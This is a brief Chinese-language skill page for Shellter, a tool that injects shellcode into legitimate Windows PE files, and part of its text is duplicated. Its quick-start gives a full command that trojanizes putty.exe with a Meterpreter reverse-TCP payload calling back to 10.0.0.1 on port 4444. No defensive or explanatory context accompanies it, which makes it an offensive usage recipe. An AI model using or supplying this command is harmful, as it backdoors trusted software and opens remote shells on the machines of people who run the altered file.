shellter
Installation
SKILL.md
Shellter
将 Shellcode 动态注入合法 PE 文件。
快速开始
# 交互模式(Windows 或 Linux 上的 Wine)
shellter.exe
# 自动模式
wine shellter.exe -a -f putty.exe -p windows/meterpreter/reverse_tcp \
--lhost 10.0.0.1 --lport 4444
工作流程
Related skills
将 Shellcode 动态注入合法 PE 文件。
# 交互模式(Windows 或 Linux 上的 Wine)
shellter.exe
# 自动模式
wine shellter.exe -a -f putty.exe -p windows/meterpreter/reverse_tcp \
--lhost 10.0.0.1 --lport 4444